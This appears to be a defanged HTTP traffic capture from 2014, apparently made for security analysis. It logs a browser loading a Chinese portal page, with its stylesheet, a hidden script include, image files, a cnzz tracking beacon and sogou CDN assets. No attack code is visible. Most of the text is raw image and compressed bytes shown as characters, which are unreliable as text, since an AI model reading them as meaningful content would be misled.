Last-Modified: Mon, 14 Apr 2014 11:01:42 GMT

Accept-Ranges: bytes

ETag: "06fbbead057cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:42 GMT
<!DOCTYPE html PUBliC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta content
="IE=10.000" http-equiv="X-Ua-Compatible"> ..<meta http-equiv="C
ontent-Type" content="text/html; charset=gb2312">.. ..<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">..&
lt;title>......</title>..<base target=_blank>..<link
 href="inc/style.css" rel="stylesheet" type="text/css">..<style 
type="text/css">...bj {background-color: #FFFFFF;float: left;height
: 336px;width: 509px;}...bj .top {float: left;height: 207px;margin-bot
tom: 3px;width: 509px;}...bj .top .top_left {float: left;height: 206px
;margin-right: 4px;width: 274px;}...txt1{ background: #000;line-height
: 30px;height: 30px;overflow: hidden;text-align: center;display: block
;color: #fff;margin: -29px 0 0 0;width: 231px;position: relative;opaci
ty: 0.7;filter: alpha(opacity=60);cursor: pointer;float: left;font-siz
e: 14px;}...bj .top .top_right {float: right;height: 207px;width: 231p
x;}...bj .top .top_right .right_01 {height: 95px;margin-bottom: 4px;}.
..txt2{ background: #000;line-height: 22px;height: 22px;overflow: hidd
en;text-align: center;display: block;color: #fff;margin: -21px 0 0 0;w
idth: 231px;position: relative;opacity: 0.7;filter: alpha(opacity=60);
cursor: pointer;float: left;font-size: 12px;}...bj .up {float: left;he
ight: 126px;width: 509px;}..ul {margin: 0;padding: 0;}...bj .up li<<< skipped >>>

GET /miniindex/images/Untitled-1.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive

GET /miniindex/images/Untitled-1.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive



dex_junsi").getElementsByTagName("li"),...indexTit = document.getEleme
ntById("roll-news-title-junsi").getElementsByTagName("a");.....functio
n showImg(i){....for(var j=0; j<length; j  ){.....indexImg[j].style
.display = "none";.....indexLi[j].className = "";.....indexTit[j].styl
e.display = "none"....}........indexImg[i].style.display = "block";...
.indexLi[i].className = "roll-news-index_junsi-hover";....indexTit[i].
style.display = "block";.......}...showImg(index);......function chang
e(k){....showImg(k);....slideFlag = true...}......function autoSlide()
 {....setInterval(function() {.....if(slideFlag) {......showImg((index
 1) % length);......index = (index 1)%length;.....}slideFlag = true;..
..}, 3000);...}...autoSlide();..</script>..<div style="displa
y:none">..<script language="javascript" type="text/javascript" s
rc="tj.js"></script>..</div>..</body>..</html&
gt;..HTTP/1.1 200 OK..Content-Length: 19666..Content-Type: image/gif..
Last-Modified: Sun, 13 Apr 2014 01:54:58 GMT..Accept-Ranges: bytes..ET
ag: "0859c5fbb56cf1:420"..Server: Microsoft-IIS/6.0..Who: ShanIE..Date
: Sun, 01 Jun 2014 03:33:44 GMT....GIF89a..s...........gE..u......e:".
........vvwY7$............fefsF).......=Fc4.iB).\F.SP.eTyR7..x.cHWVW..
.GEEtK1...Z1.V ....saW.uS.uVxWD...............J&....E..7......wc'#$...
...jG2..........ru...755.......b?.........7!..jS.......S3...F .U@9....
.................".........Z:.\<....{z......y{..th......hio......d[
U...TGC..........nK.........l.....Z[`...............,..V$....rkf..<<< skipped >>>

GET /miniindex/inc/normal_bg.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 41703

Content-Type: image/png

Last-Modified: Thu, 10 Apr 2014 17:05:46 GMT

Accept-Ranges: bytes

ETag: "0511e1ddf54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:47 GMT
.PNG........IHDR.......!.......c.....sBIT....|.d.....pHYs...........~.
....tEXtSoftware.Adobe Fireworks CS5q..6....tEXtCreation Time.07/11/13
........prVWx......0...."k..a#...8.v..0...b!xkb8......I...I_..;\.uH.4.
.......1.]........,S..v.._.r...us...."MU.v.....j..j...Z..S...r..}.....
.|K...........w{\..p..........&b.....HmkBF............................
............................................).3...:.mkTSx..}Kl.Wvv.lY"
EQ..8..a......z. ....l.v.lu7%J1.TWwI.Q.L..(...#.......3..e.U&....>@
. H..Yg.eV3...s....u.Iv.I.h.............O........r.t......6|M.....2...
...{..3V.G.y..t..Z....;c.p.k=g\..now.....C8.......z.|4V....Me......X.k
e_....-.|.,.I.o..G.PYQ.d.Ke.v.;.8..6.{....U.zss.l..-...i.R..5....k..6.
W.M.O.il.....w.........f...u...[...}z.~..d...6....m...6w4.NsG..4w.lZd.
N..6.4n.l....*...Y6TF....iW.....Q.......1....6...B...a":Y.......Y%.~D0
......3..M....8t..>x.&...'jO......1. B.3.1.".S.L..I.2.^.1.j.G....`.
^F.....`x.a.'c..D.N...Qh.2E..R.1(....J.J...S.S.......E :.a.'.......S..
...i.9..(.ieH1.0Hm).z...t[>v...k.s.].*C.L..R4..<.dQ..mH..A..Y.}.
.2.y.S.g@~.;u... |.i....pL..2.....Z.D......D.J.4.8c..sZ.g.....F...7.E.
.H.<..)x.J..1.J..zj....sJ...S....2..A...AqD.."..I5.rn.....9..j.Y.. 
@.4...w.@[email protected]...}.,..6.
...c.;r..Fuj.......Y;@.^..G.v...".-/a.'..>l.@.,1V....0.T...g..f$...
..'.B.'....LQ.<....m..C...z..!.....A..1f .c..^....-.\...Z.8z..k..I.
...3d....>h...h...q....S....-..H....$7l...$.az$....j.>...P...XR.
....P..]4.z......,~....'........<}.M....R.8<f...........0..2<<< skipped >>>

GET /miniindex/images/Untitled-3.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 31591

Content-Type: image/jpeg

Last-Modified: Sun, 13 Apr 2014 02:27:26 GMT

Accept-Ranges: bytes

ETag: "0bbb5e8bf56cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:48 GMT
......JFIF.....H.H.....ZExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:13 10:27:24....................
.....................s...........................................&.(..
...............................$.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................p...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'[email protected]@..... [b..*.X$d.9......U.f.
@.o...%.*e9.QX.U.....K.....B>..-... .|T....|.b.h.........Bh.#.....-
..rp.RZ..eZ..i..5>.....M...5Y.O#..h.b.............R...).G-.W.P6.Ic^
..cG%.....*..g..v3X.ki9...].....H.a=......Os.l3'e.i.m...........(.....
}.;?...O........]^.......`q5.l.5m6..w.?5v~..[.........{...>........
....X....Sus.`..o..E.....El.F......#>...4..t .....:@..._^[email protected].
v....B...)..,.5a%n.s.......B.....:.{.........[...O>yR.....p.J..f...
....?h...uF..../...j....W:?jPO..'.eG.x..{.N.....].h.....U....gw...*...
.C.B...)....z.......`.l..t....C..fu..0.OM..X.... g.K...R.;>.....U&.
;]c.....,.s......qjy........O.....P3.....i..u.....{...............<<< skipped >>>

GET /miniindex/inc/min.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 1080

Content-Type: image/png

Last-Modified: Thu, 10 Apr 2014 17:05:46 GMT

Accept-Ranges: bytes

ETag: "0511e1ddf54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:48 GMT
.PNG........IHDR...l.........u.......tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx....k.Q...kfwf...F.B........ ..6.Z(.[..../..F.,l,E.". "./P
.....M.....}x...........i...9.|.~w.../..C.>FBIdq.....O?L.;...P.*..p
...WS.6._..^d..}.._..............D.. .*H.>.r)V.*k...k.kc.S........_
D.-..BJ.$...G...Y.\......lX.1D.......Z0H.\..*L..59B...... ...:CV0$a>
;...e....V3Q.g.`].$5.P........(.`....I...JlX:..7.U.#.X.....>K'..!..
Rj.!.&.k. ../#p.VY....-.tHLT..3#Q..D.GD...IL2;.q%-W$uK...D.> ....G.
...q....nY..QNK^j...Y.......b.f..0*.|.n.<.t|zP.c.g.0.K.. .R........
.=>... .../....8.t...H.).4.I. L.$.90s.3....S_:... ..<Hak5$yqz0.5
K.M....q4.g..........).d7..w......q.. h.M...*N...f...b..Gn=..<.}...
..&..~...B..~...y.D8.U2]/8.`%.E.F..l....~. .G..(l...L.JU.5.,=N.%..".2.
<[email protected].....=....C.h..~.z..qfU..*....#......o..8..a..<.....
*.b.0'Ga.........G..].jB.3}p1_i...6..J..)a......9Zf.k.b.|..6.J...a....
..^.G......j.u>........Q.5.u.....6....0%....Y..V..Q..K.RGj....a..&g
t;.../.....m.<..E..b.....d.{...s.L. -...$..6`?......<.[pKN.Rj..X
X4.... ;.N.'7..a.$6X3{..(.`z............[.?g.ab..z..U.....'d...B.;....
IEND.B`.....


GET /miniindex/inc/style.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 3717

Content-Type: text/css

Last-Modified: Thu, 10 Apr 2014 16:40:38 GMT

Accept-Ranges: bytes

ETag: "0c7479adb54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:49 GMT
*{margin:0px;padding:0px;}..html,body {overflow: hidden;}..body {font:
 12px/18px Simsun, Helvetica, Arial, sans-serif; text-align: center; f
ont-size-adjust: none; font-stretch: normal;}..ul ,li{list-style: none
;}..a {color: rgb(51, 51, 51); text-decoration: none;}..a:hover {color
: rgb(189, 10, 1); text-decoration: underline;}..a,img{border:0px;}...
focus_filter {left: 0px; width: 100%; text-align: center; bottom: 0px;
 display: block; position: absolute; z-index: 3; cursor: pointer;}...f
ocus_filter {background: rgb(0, 0, 0); height: 21px; z-index: 1; opaci
ty: 0.6; -moz-opacity: 0.6;}...main {background: rgb(255, 255, 255); p
adding: 14px 0px 0px 14px; width: 509px; height: 352px; text-align: le
ft; float: left; position: relative; -ms-zoom: 1;}...main_left {backgr
ound: rgb(255, 255, 255); width: 222px; overflow: hidden; padding-righ
t: 20px; float: left;}...product_yl .list_news_yl1 {padding: 4px 0px; 
margin-bottom: 3px; border-bottom-color: rgb(139, 140, 140); border-bo
ttom-width: 1px; border-bottom-style: dotted;}...mod_left {margin-top:
 10px;}...list_pic {width: 222px; overflow: hidden; -ms-zoom: 1;}...li
st_pic ul {width: 232px;}...list_pic li {margin-right: 10px; float: le
ft;}...list_pic li a {padding: 2px; border: 1px solid rgb(221, 223, 22
2); width: 100px; float: left;}...list_pic li a img {width: 100px; hei
ght: 65px;}...list_pic li a span {height: 19px; text-align: center; pa
dding-top: 6px; display: block; cursor: pointer;}...list_pic li a:hove
r {text-decoration: none;}...list_pic li a:hover img {text-decorat<<< skipped >>>

GET /miniindex/images/b14.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40898

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 07:49:40 GMT

Accept-Ranges: bytes

ETag: "0c21517b657cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:49 GMT

......JFIF.....H.H..... Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 15:49:39....................
.................................................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?.....N%.....Dj...V}../t.}..../...*.
KH.\7W.7t..9..>...............u............v..e. 8.......u~.....?..
... .Y[...m5...5..^.c..7{.......q>...[...'.....7.Y.....L.........L.
..K..8...).K.....:.........&..'....\.j.E.....G.-g2.t-...h....SE8....g.
.N.0..t...tQe.)....tm...k. .......ur>.....Lhm..[.#MWB.2K W>>.
?r.......v.=..D...`....S...}^..V..b.u.c.V..2.j&......=..\}.....Vh..G.k
mc...H./N..T.....m~...l;..i..r,kE..\.......3].....?..?1.c.8......e....
.j.DJ.....=......B.....z.G...62.X...4.......*wu....mk...~j..'.. .q.w.&
gt;. .4..9.>....W.F.o..'.i.y&.../c.P.K..gN..~T..2...D.LsOhU.gtB....
@.x.UNY*&.P..US...pn..W4...u[...b.<[email protected]

<<< skipped >>>

GET /miniindex/images/b17.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40997

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:05:38 GMT

Accept-Ranges: bytes

ETag: "0f51852b857cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:50 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:05:37....................
.................................................................&.(..
...............................{.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..uM...[O |T.......=;h.<..O...F.
....x..R.x}...8.>.xG...'i...2;.1.R.3.>...ILt.I.?"....V.......a..
.. .US~..].kr)$../k\..J1.$.t...:mG%...K..z. z...e....=.....u*..,[.T...
.w[E..Z.....p_VG........X...m.... .....v..q..q....Tv...73w.u..@f...,xG
.yk......S1.k....7G.v............R.h5....;......C....)....&....}...j..
....k}`U0m..~.....o."..H_v.......<.L%.`.I;.Q...lo...Q.!...C.......q
.....g.F.)aE.r.../...t|.g.!1.D..?uF\u!.....h.....t......#.).O...G.Q2u.
........P$p....O..#.RB..@.....>T......xG."Q.}.2...l..u...8.....s...
.3z.h...q......\...o...UM.u.....O..3.}[ki...U./........?....H...xB...[
.........K....w.....(.C.|...c..8....-..U........v..Wn.g....s=oQ{.v<<< skipped >>>

GET /miniindex/inc/style.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 3717

Content-Type: text/css

Last-Modified: Thu, 10 Apr 2014 16:40:38 GMT

Accept-Ranges: bytes

ETag: "0c7479adb54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:50 GMT
*{margin:0px;padding:0px;}..html,body {overflow: hidden;}..body {font:
 12px/18px Simsun, Helvetica, Arial, sans-serif; text-align: center; f
ont-size-adjust: none; font-stretch: normal;}..ul ,li{list-style: none
;}..a {color: rgb(51, 51, 51); text-decoration: none;}..a:hover {color
: rgb(189, 10, 1); text-decoration: underline;}..a,img{border:0px;}...
focus_filter {left: 0px; width: 100%; text-align: center; bottom: 0px;
 display: block; position: absolute; z-index: 3; cursor: pointer;}...f
ocus_filter {background: rgb(0, 0, 0); height: 21px; z-index: 1; opaci
ty: 0.6; -moz-opacity: 0.6;}...main {background: rgb(255, 255, 255); p
adding: 14px 0px 0px 14px; width: 509px; height: 352px; text-align: le
ft; float: left; position: relative; -ms-zoom: 1;}...main_left {backgr
ound: rgb(255, 255, 255); width: 222px; overflow: hidden; padding-righ
t: 20px; float: left;}...product_yl .list_news_yl1 {padding: 4px 0px; 
margin-bottom: 3px; border-bottom-color: rgb(139, 140, 140); border-bo
ttom-width: 1px; border-bottom-style: dotted;}...mod_left {margin-top:
 10px;}...list_pic {width: 222px; overflow: hidden; -ms-zoom: 1;}...li
st_pic ul {width: 232px;}...list_pic li {margin-right: 10px; float: le
ft;}...list_pic li a {padding: 2px; border: 1px solid rgb(221, 223, 22
2); width: 100px; float: left;}...list_pic li a img {width: 100px; hei
ght: 65px;}...list_pic li a span {height: 19px; text-align: center; pa
dding-top: 6px; display: block; cursor: pointer;}...list_pic li a:hove
r {text-decoration: none;}...list_pic li a:hover img {text-decorat<<< skipped >>>

GET /imgu/2013/08/20130820165531_481.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p6.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:29 GMT

Content-Type: image/gif

Content-Length: 2049

Last-Modified: Tue, 20 Aug 2013 08:55:31 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:29 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89a..y....1.....A.....c........t..S........9........I........Y..j..
.........<..L.....y.................X...........T..s.....J..J..a..c
....................................................................!.
....*.,[email protected],....r.l:...tJ.*.X.*......6.]...3Z.^.........^..
m........M\fDyH.[G.t.D.t.D........D..Y.X..D..........C..............c_
x.......K..J. C.J....*..H......I.Y...I....J....".....G..X..H.....@....
...".`O..e.28A....%..a..B... C...a...I.....$..EF\[email protected].. 2........h0
d...H."e9AH....X.....1.....5...U.....lY,[email protected]....$......
.'.....@ 8".Wc.]..U. ...."\[email protected]..;....8..A.;.....
..........@..%[email protected]..>.p..C,..H@..@......"
.]...u.B...0.....S...A.].."A......X(.............z\80Ak...@[email protected]..
..g..#)..v.p... [email protected].,[email protected]...\D..X.Q......9Ch..\B..@.
ExW...`..5.`..[CH..5Hx."...@X..,..nF .H0W0....F...*[email protected]...
&%.....0.wX.p....!......{XL"`..0P.v.bq....`A..0.......}h9....(@..]9...
...M\.T.... ...........W......:P.p.d?.DG.B..OA.<. .....U&..U.x.y...
[email protected]....(...@.....,...(
4...Ll....`.4.....5.p...D.pY.>.,F...q.......K..A.X.)....-.......B.P
c....x .0p.`.0...^....C|l.........V..........!.".*3.BT........oX B&.q.
..s.$`[email protected]]..m^@......!..A..k.6.b.yD..d.....o.Gc.$L.y.
.Bj^...S..O.S...............R?.E.Fz... [email protected]%...m]..
.......... ..@...........&$...`*..n.C....?....0..0 b.b..Dh..0....L.aH.
*R..(.........>F.M.p(.S...g<.....5.!Bi,...t.9.....c..p..de..<<< skipped >>>

GET /stat.htm?id=5645354&r=http://VVV.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=4&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17580&sin=none&t=undefinedundefinedundefined&rnd=408044026 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs10.cnzz.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3


HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Sun, 01 Jun 2014 03:33:59 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:23 GMT

Content-Type: application/x-javascript

Last-Modified: Tue, 27 Aug 2013 08:33:31 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
b9b.............Y.o....=...}mH....yx....vZ.p..q...P,....*I...........#
@Lrvvvv.ofW...g......Hx-...... ........UQ.emk kq.CQiA^j'..k..n.2_e....
x.kg.o......:....W.:.K[;-..v.'.(A}..8.5.D.....D..<..oW....uaO...-./
.8..e*..Q.....H.)&...*.3[.Y3._.....Y%|...R.#..9.n..JJ..f...%..Y...O.Dh
....A.id.....*..O7|n,..T.e."......d%...9.fg.e..Z...m..m..L..4O_'..>
;<.>...X...*...33N....a.7...?....a....A....J...=M..T./.'.`.y5...
.8....{.20T.P......M....UKc.g....7.&[..]y.Hyu..^.WyP....].0c...z_?&.}$
D=T.v..|.:.Zj'..tV.<f,\......cwU.....93Y.~......4"....O.8....U....!
t.l9..e..~.....F..c.:.o...\...Zh....>..kWD..F...D...._%.w...06rs.&V
./.&.y..#m.Vy../FS...b..)..g.H.%....n.,..Bs..t[}.........h.....s....B.
......~....EFZ.E..z.;...G..'.Y.qV.?....;..%:o...........n.A.....^...y.
...[R.*.`.......I.3.. .U.x2W.....J..W....B..g..*....5.s.!.^4.. `{^z...
.....h.....e.(Fc=B(..E..p.]c....R.eD...k.A:y...nd..c.Ã..z..Mr..-..:.
.L....&...W....z:7..d....d.)Gw.x..~5;..qR#..U.7.....H......{...v..)...
I..v../....G6....yV....[..Ql....>.|}...a.dnn..f..|fL...'h......*J.'
.W.d..(M. W[[email protected]_....Z.........s....#!...(c..d...&l
t;.........$.....Y...:Z..... ..y..]....K)*.O.q.C=*.$..q.Gf.....*WY....
...Z<..c.3.._`LDj....`.jDj..\0....<...xy.xN}..LK.G..5..3....5...
|.3CS...,|.6...*.d...X).....Q6.BlQ.A...}....:.W..q......ad8bc.p.......
n..;e.<L0 d....w...OG..<D....'..m....3.Q.....K=6.kK..5.....M.3..
w.Z......[....#...N\.G$F.!.KS../y.:s......[.).c..h'uc....V`...(...@...
.../..j...."..C....pB.!.....f.Px.r..[p...R.......b..]u.I%.6|.NAXs.<<< skipped >>>

GET /imgn/v32/icon4.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:24 GMT

Content-Type: image/gif

Content-Length: 1506

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Accept-Ranges: bytes
GIF89a".....................v.....Cs.`}...............................
...I{.b...........................................................U..m
..r..........................M..Z.....................................
......................................................................
......................................................................
.............................mmm^^^QQQ777......!.....~.,....".......~.
...................................................................dKG
8HINi.];K.D.kUMJ[.LG`....DIa.O9c.o|z.bKL.i8p.zy{x..G..OL....'@.>w.Y
.....ox..).n..:..(.....oz...........XB.......9.3@.'...........5..H...5
....m..HNk...4.... uYR...7.....Rj./J.H..d...p....d....5.(ybi..%<..f
....Lk.4Y..M....<I..G..T2.eB%.. I.X..dI..T.R...m.6J.H...M.<?....
CR..w~...T...<F?r....v...<.Rk....D.}<..1..<9........y..9t;
z..S...B.....mU..1Ga.T.L...B...];..p.t....$r(..Oz...Ou8..$[...[d...%[ 
1@M~.0.%T ..`N.....`....5aE}..)...,P..H&YD.%E...[,[email protected]....%.`C...`...
....%..B.!x....,9..%. '.jv.A.a......y....)..}.`'..P...t.z(..4..76t.C.Y
.P..If....h...=dP...0`*........*[email protected]......)...$.Lq...&.....`@..
.p.."..A.!..B.S....)D;.....m.1L1A....n$.L...$@...>L....x..$).a(..L.
........>B........H.....(..$...A..lp.....B..4...Pp..."D ..&k.r#....
.<C...SL1...F....P.4.L7....F-.....@. 4.B&#X...#p....dp...p`..S@1E.?
..@%g..A.2....P.....4.@.'.PC.1....P.p.......z.^..!.....H2A....w.&.@.. 
L.B......&......`...BrC.f@..."....&<.)$u....g.....,[email protected][email protected];..@ 
..3Lr.?.=.`...h....,`v.).....: ...B^...,0...0..R...\b..PA.R`..xbkT<<< skipped >>>

GET /v53/imgn/v53_bicos.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 826

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
GIF89aD.......Bo...v..1..;o..........f...W.......;........e...W.d.....
.........@......`..P~%[email protected]{......Z...
...W.%h.t...d................@..&z..Hv......L...\.Q~..R....6..........
..h..Ky...y..Y..Cp..a...........R.....Z.....Cr.c..........:......o....
...$m..f....&}........................................................
...............................................!....._.,....D......._.
.............@'K3@?...0 0...''@...'....0......KK.3$.;=3........'*K??G.
.CCH8........?'/[email protected]&&LLN.T@@.. .. .mXR.....7(a. 
...4>.[[email protected].)...?.n..e...4P...H...R.H......P........4..dY...'.
[email protected]......?F)..!....BX...A......1.^.... u@..,!_9..{[email protected]
....tHr..]A.~..7`....N......!J...pb..AF.L....._O..;....!]..#2...AF.H..
 .4#.~D.b%.....,.... .h..p.DP.W.......o..><0.K..{.O.@Q .;t>....

GET /v53/imgn/v53_arrow_h.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

